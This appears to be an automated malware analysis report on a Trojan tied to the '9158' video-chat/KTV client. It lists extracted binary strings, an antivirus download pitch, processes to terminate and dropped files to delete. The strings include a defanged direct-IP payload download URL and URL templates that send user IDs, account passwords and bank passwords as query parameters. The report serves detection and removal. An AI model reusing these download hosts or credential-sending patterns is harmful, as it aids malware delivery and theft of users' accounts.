/active/userinfor/userview_up.aspx?useridx=%s|viewid=%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LoginCount
LastLoginType
SOFTWARE\9158web
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
<b>%s</b>
<span style="cursor:hand;font-size:13px" OnClick="window.external.MsgEnterRoom('%d')"><b>%d</b></span>
<div style='font-size:14px;padding:5px;color:#104b8f;line-height:25px'>%s <b>%s</b>
%s  
<span style="cursor:hand;font-size:13px" OnClick="window.external.MsgEnterRoom('%d')"><b>%d</b></span></div>
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content: 
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=2 scrollDelay=2 direction=left>
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
<br><br><div style='font-size:14px;padding:15px'>%s<a href='hXXp://v.9158.com' target='_blank'>
%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
<div align=center><img onclick="window.external.FreezeBank(11);" src='
//skinres//Moneyupfreeze.bmp'></div>
//skinres//MoneyRestPass.bmp'> 
<img onclick="window.external.FreezeBank(12);" src='
%d-%d-%d %d:%d
MainUrl->CityWide_Step1.MainUrl=>Url:%s?&&
hXXp://room.9158.com/apps/Activity.ashx?act=8&lastime=%s
%s?user=%s&itype=%d
SkinRes\icon_rt.png
<img src="%s" style="float:right;"/>
</strong></p><p> %s</p>
</strong></p><p> %s<a onclick="window.external.GotoGetGift()"; style="float:right; cursor:hand;">
hXXp://roommanage.9158.com/active/song_tui/code_view.aspx
<html xmlns='hXXp://VVV.w3.org/1999/xhtml'><style type='text/css'>.item { position:relative; float:left; height:167px; margin:10px 15px 25px 0px; width:160px; } .item .bottom_bg, .item .del, .item .del2, .item .hide, .item .hide2, .item .line { display:none; } .item .item_bg { background:#dfefff; border:1px solid #d0e8ff; height:165px; } .lock { position:absolute; left:10px; top:10px; } .item_sel .bottom_bg, .item_sel .del, .item_sel .del2, .item_sel .hide, .item_sel .hide2, .item_sel .line { display:block; } .item_sel .item_bg { height:165px; background:#d9ecff; border:1px solid #b4daff; } .bottom_bg { position:absolute; left:0px; top:165px; width:160px; height:27px; background:#b4daff; } .item .hide, .item .del { position:absolute; left:106px; top:172px; color:#27384e; font-size:14px; text-decoration:none; } .item .del { left:22px; } .item .del2 { position:absolute; left:25px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .item .hide2 { position:absolute; left:106px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .prev, .next { background:#E7F3FF; border:1px solid #AFD7FF; padding:5px 15px; *padding:5px 15px 4px 15px; color:#004FB6; font-size:14px; text-decoration:none; } .prev2, .next2 { border:1px solid #b7c6d5; color:#8a9fba; cursor:default; }</style><body style='background:#EBF4FF; color:#333; font-size:12px; font-family:arial;'><div style='margin:10px auto 10px; width:99%;'><div><div style='position:relative; z-index:1; background:url(#pic#title_bg.png) repeat-x #c2e0ff; border:1px solid #bee1ff; border-left-color:#b3d7fd; border-right-color:#b3d7fd; border-bottom:none; height:36px; line-height:35px; vertical-align:middle; overflow:hidden;'><div style='position:absolute; z-index:9; left:10px; top:0px; text-align:center; font-size:14px; color:#2D4389; text-decoration:none;'>#sel1#</div><a href="javascript:window.external.OnHistory_Showinfo(1,0)" style='position:absolute; right:10px; 
padding-left:17px; color:#2D4389; text-decoration:none; background:url(#pic#f5.png) no-repeat 0px 10px;'>
#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'"><div class='item_bg' onclick='window.external.OnHistory_Showinfo(2,#pa#)'><div class='img' style='position:absolute; left:0px; top:0px;'><img onerror="this.src='#purl#'" src='#p5#' style='border:none;width:160px;height:120px' /></div><div class='lock' style='display:#p4#'><img src='#pic#lock.png' /></div><div class='text' style='position:absolute; left:10px; top:124px;'><p class='name' style='color:#004fb6; padding:2px 0px; margin:0;'>#p2#</p><p style='color:#475465; padding:0; margin:0;'>#p1#</p></div></div><div class='bottom_bg'></div><span class='line' style='position:absolute; left:80px; top:165px; width:1px; height:27px; boder-left:1px solid #a9ccee; background:#a9ccee;'></span><a #p8#>
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"
\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
<img width="227" height="67" src="%s">
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')">
<img width="49" height="50" src="%s" style=cursor:hand>
hXXp://
Head\user_photo.bmp
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }
div.img50 img { max-width:50px; max-height:50px;
yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
<body scroll="no" bgcolor=#FEFECC><div class="img50"><img src='%s' /></div></body></html>
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="window.event.returnValue=false;" style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none">
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\QRCode.bmp
SkinRes\TG\mins1.bmp
SkinRes\TG\closes1.bmp
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M      %Y/%m/%d
nIDKey
MsgCloseBtn
celeburl
taurl
relogin
gourl
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmin.bmp
SkinRes\buttonclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&psw=%s&useridx=%s
%s&r=%d
{6C9A41B3-ABB2-45f7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\phone.bmp
SkinRes\lock.bmp
SkinRes\key2.bmp
SkinRes\key1.bmp
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://pay.9158.com/v/ips/NetPay_vip.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
<a target='_blank' href='%s'>%s</a>
/active/userinfor/get_userview.aspx?useridx=%s&r=%d
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
<script>window.onerror=function(){return true;};function isSecurity(v){var sinfo;if (v.length < 3) { return 0;} var lv = -1; if (v.match(/[a-z]/ig)){lv  ;} if (v.match(/[0-9]/ig)){lv  ;} if (v.match(/(.[^a-z0-9])/ig)){lv  ;} if (v.length < 6 && lv > 0){lv--;}switch (lv) {case 0:sinfo='<font color=red>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:0px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:#d5eaff;}td{padding-right:5px;height:15px;font-size:12px;color:#666666}a{color: #0b66c2; text-decoration:none;};a:hover{color: #0b66c2; text-decoration:underline;};</style><body>
SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
<table onMouseOver='window.external.OnKillTimer(0)' onMouseOut='window.external.OnSetTimer(0)' width='100%%' height='100%%' border='0' cellpadding='0' cellspacing='0' align=center><tr><td bgcolor=#c8e3ff width=84 align=right>
:</td><td width=15> </td><td width=90>%s</td><td></td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td colspan=2>%s</td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td id=passqd name=passqd style='color:red'></td><td><a href='%s' align=left target=_blank>
:</td><td></td><td>%s</td><td><a href='%s' align=left target=_blank>
:</td><td></td><td style='color:gray'>%s</td><td><a href='%s' align=left target=_blank>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:5px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:white;}td{height:19px;font-size:12px;color:#666666}a{color: blue; text-decoration:underline;};</style><body>
SkinRes/userlogininfo.png
<body style="overflow:scroll;overflow-x:hidden;overflow-y:hidden;margin:0;background:url('
SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
skinres\WarehouseBG.bmp
CWebBrowser2
:%d%d%d%d%d%d
%s&surl=%s
-%d-1
skinres\weibo\SendWeiBoTop.bmp
SkinRes\weibo\CloseWeibo.bmp
/**%nick/**
hXXp://room.tiao58.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
version="1.0.0.0"
name="test.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
{8856F961-340A-11D0-A96B-00C04FD705A2}
6, 7, 0, 3
Windows

9158IE.exe_2252:

.text
`.rdata
@.data
.rsrc
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
9158IE.exe
Content-Type: application/x-www-form-urlencoded
CWebBrowser2
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
9158IE.EXE


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    yx_dts.exe:1476
    %original file name%.exe:1452
    notify.exe:2104
    9158chat2_ktv083_98.exe:516
    assistupdate.exe:2080
    dts.exe:1728
    dts.exe:1772
    OfficeAssist.0419.80.1123.exe:744
    OfficeAssist.0419.80.1123.exe:1752
    regsvr32.exe:2136
    regsvr32.exe:2716
    regsvr32.exe:1280
    regsvr32.exe:2280
    regsvr32.exe:1124
    regsvr32.exe:2940
    9158.exe:2088

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Desktop\大天使之剑.lnk (944 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\大天使之剑.lnk (922 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\卸载大天使之剑.lnk (975 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\大天使之剑.lnk (956 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
    C:\temp.icon (1444 bytes)
    %Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
    %WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\卸载 9158多人视频.lnk (505 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (575 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
    %WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
